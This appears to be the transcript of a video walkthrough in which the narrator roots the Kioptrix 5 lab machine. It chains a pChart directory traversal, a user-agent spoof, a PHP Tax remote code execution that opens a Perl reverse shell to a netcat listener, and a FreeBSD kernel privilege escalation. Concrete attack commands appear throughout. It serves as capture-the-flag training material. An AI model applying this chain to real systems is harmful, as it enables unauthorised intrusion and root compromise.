Hi, today I'm going to show you how to break into Kioptrix level 1.4, also known as Kioptrix 5. This is the last machine in the Kioptrix series, so if you haven't done the others, I suggest you go do those first, and I have videos for each of them as well. I've really enjoyed this series as each machine has something new to it, though I might try and pick something more in depth for the next series. For now, I hope you enjoyed this series, and let's get started. As always, we start by identifying our target machine. Use the ifconfig command to find your host IP, in my case it's 10.0.2.25, and then use nmap to scan for all hosts on that network using the command nmap 10.0.2.0/24. We can see our host at 10.0.2.31, so let's run nmap again, this time with the -A flag and only for the target machine. The -A modifier allows for operating system and service version detection. We can see that nmap has detected 3 ports for our target machine. Port 22, which is an SSH port and is currently closed, and ports 80 and 8080, both of which are HTTP ports running on the FreeBSD version of Apache. Given that we have 2 open HTTP ports, let's take a look at them through our web browser. Port 80 contains the message "It works," while port 8080 does not appear to be accessible at this stage. If we look at the page source for the port 80 page though, it contains a URL, so let's take a look at that by appending it to the end of our target IP. It takes us to some sort of charting software called pchart version 2.1.3. Let's take a look and see if we can find an exploit. Back in your terminal, use the command searchsploit pchart. Depending on the number of hits you get, you could be more specific in your search terms by including version numbers, but in our case there is only one result anyway. Let's mirror this exploit to our system using the command searchsploit-m php/webapps/31173.txt, then use cat 31173.txt to read it. Reading through the exploit, it seems that pchart includes vulnerabilities to directory traversal in which we can access typically inaccessible files, such as the password or config files, as well as being vulnerable to cross-site scripting attacks. In our case, we are going to exploit the directory traversal weakness. All we need to do is copy everything after the index.php and add it to the end of our URL. In the example given to us by the exploit, we are taken to the password file, which is a good proof of concept, but not actually much help to us at this stage. Instead, we want to be able to access something like a configuration file. Now we know from our nmap scan that the HTTP servers are running on Apache FreeBSD version 2.2.21, so let's use Google to find the default pathway for the config file. Once we have that, all we need to do is replace the path for the password file, in this case it's just etc/password, with our new path. Sure enough, this brings up the config file. This config file contains a lot of uninteresting information, but if we scroll right down to the bottom, we see the line, set environment if user agent is Mozilla version 4, and then underneath that, the details of the 8080 port, which is set to allow only if the environment is Mozilla 4. In other words, the reason we weren't able to access the 8080 port earlier is because we are not using Mozilla 4 to access it. Fortunately, this is an easy fix. Open up Burp Suite and turn on your browser's proxy. If you haven't got a proxy configured, I will put a link in the description on how to do this. Just use the default settings for your Burp Suite project and turn Intercept on. Back in our browser, let's try again to access the 8080 port of the HTTP server. We can see in our Burp Suite Intercept that our user agent is set as Mozilla 5. To change this, click on Proxy Settings and scroll down to the section named Match and Replace Rules, and enable the top option, which is Mozilla 4. Exit out of the settings and hit forward to allow that traffic through. Now, instead of an error, we are taken to an index page. Click on the link and allow the request through Burp Suite again. It takes us to a page containing a bunch of links and a tax document. All we really care about here is that this is using a piece of software called PHP tax, so let's use our trusty friend searchsploit again to see what vulnerabilities exist for it. There are 3 options. The first is a Metasploit module, But I've used Metasploit in previous videos in this series, and I want to demonstrate something different for this video, so we're going to ignore that one, and instead use the third option, which is labelled PHP Tax 0.8 Remote Code Execution. Once again, we will mirror the exploit to our host machine, and use cat to read it. This exploit takes advantage of the lack of input validation for the drawimage.php file. Specifically, the p file's parameter, which is directly used in an include statement without validation. What this means is that we can inject our own commands and the application will run them. The example in the exploit uses a bind shell, but we are going to do something a little bit different. First, we need the code to generate a Perl reverse shell. There is a cheat sheet for reverse shells on Pentest Monkey that I will link in the description, but I find it easier to have text files for reverse shells ready to go, which already include my host IP and chosen port. If you're doing this, you can use the same code, but change the IP address to your own host IP and your selected port. Next, we need to encode this as a URL, which involves replacing spaces with plus signs and replacing special symbols, like the ampersand, with their percent encoded equivalents, such as %26. The easiest way to do this is to simply copy and paste your command into a website that does this for you, such as mayaweb.com. Now we need our vulnerable code, which we can copy over from the exploit, making sure to change localhost to our target machine's IP and specifying port 8080. We can then delete everything between the two semicolons and replace it with our own reverse shell code. We now have our final URL ready to go with our payload for the Perl reverse shell. Final step before we can use it though, is to set up a netcat listener for the port we specified in our reverse shell, in my case, port 1234. Use the command nc-lnvp1234. With that done, copy and paste your final URL into your browser and hit enter. If all has gone well, we should now see our netcat listener has a connection. Use the whoami command to verify that we are logged into the target machine as a web user. Next, we want to find a way to escalate our privileges. Let's start with the kernel version. Use the command uname-a. We can see that we are using FreeBSD version 9. Once more, let's use searchsploit to find an exploit. In this case, we have two to choose from, but both are for local privilege escalation, which is what we are after. I'm going to use the second one today, so I will once again mirror it to my host machine. Next, I need to upload it to my target machine. I'm going to use netcat to do this. On my host machine, use the command nc-lnvp5678 less than 26368.c. Then, on my target machine, change to the temp directory using the cd command so that we will have write permissions, and then use the command nc10.0.2.25 5678 greater than 26368.c. At this point, my machine disconnected, but I was able to reconnect by restarting the same netcat listener from earlier on port 1234 and then refreshing our encoded URL. From there, I could navigate back to the temp directory and used ls to verify that our file transfer had gone through. From here, all that's left to do is compile our exploit with the command gcc 26368.c -o 26368. Then, run our new executable file with /26368. Use whoami to verify that we are now root. Finally, let's use cd/root to navigate to the home root folder, ls to list the contents, and cat congrats.txt. So there you have it. We have successfully achieved root access to all 5 Kioptrix machines. I hope you've enjoyed this series of videos and learned something of the principles and concepts involved beyond simply copying the exact commands I am using. I'm still deciding which series to tackle next, but if you have suggestions of either series or individual machines you'd like me to do videos for, leave a comment. Until then, good luck with your own hacking exploits.